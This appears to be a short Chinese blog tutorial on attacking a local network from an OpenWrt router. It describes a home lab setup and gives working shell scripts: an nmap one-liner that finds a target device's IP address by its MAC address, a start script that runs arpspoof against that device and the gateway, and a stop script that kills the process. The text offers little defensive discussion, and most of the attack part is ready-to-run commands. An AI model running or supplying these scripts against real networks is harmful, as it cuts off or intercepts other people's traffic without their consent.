前言
作为智能路由器的操作系统,openwrt可以做很多一般路由器系统难以完成的任务。而且由于它作为整个局域网上网的出口和入口,一旦有问题,影响是很大的。
攻击场景
我实验的环境是这样的,屋子有2个房间,每个房间一个路由,都通过一个主的电信的光猫来上网(内网地址192.168.1.1),其中一个房间的路由刷入了openwrt系统(内网地址192.168.1.2),另一个为普通的路由器(内网地址192.168.1.3)。我们攻击者连接到OPENWRT路由器上,此时相当于攻击者和另一台普通路由器处于了网络拓扑中的同一级,此时我们在局域网中常见的攻击手法就都可以使用了。如果此时,我们在openwrt上对另一台普通的路由进行arp欺骗、arp断网等攻击,那么凡是连接到那个普通路由器的用户的上网活动都将受到影响。
通过Nmap获取需要攻击的设备的IP地址
IP=`nmap -sn 192.168.1.0/24 | grep -B2 XX:XX:XX:XX:XX:XX | head -1 |awk '{
print $5}'`
我们可以先扫描一下当前网段的设备,然后排查出需要重点关注的设备MAC地址,以后我们就可以通过自动化的脚步来直接获取与该MAC地址对应得IP地址并进行攻击了。
进行ARP欺骗攻击
启动脚本 start.sh
<pre>
IP=`nmap -sn 192.168.1.0/24 | grep -B2 XX:XX:XX:XX:XX:XX | head -1 |awk '{
print $5}'`
if [[ "" != "$IP" ]]; then
echo "killing $IP"
arpspoof -i eth0.2 -t $IP 192.168.1.1 &
fi
</pre>
停止脚本 stop.sh
<pre>
PID=`ps | grep arpspoof | grep -v grep | awk '{print $1}'`
if [[ "" != "$PID" ]]; then
echo "killing $PID"
kill -9 $PID
fi
</pre>
注意
由于openwrt版本不同,上述命令可能需要做相应的调整。部分软件需要先安装再使用。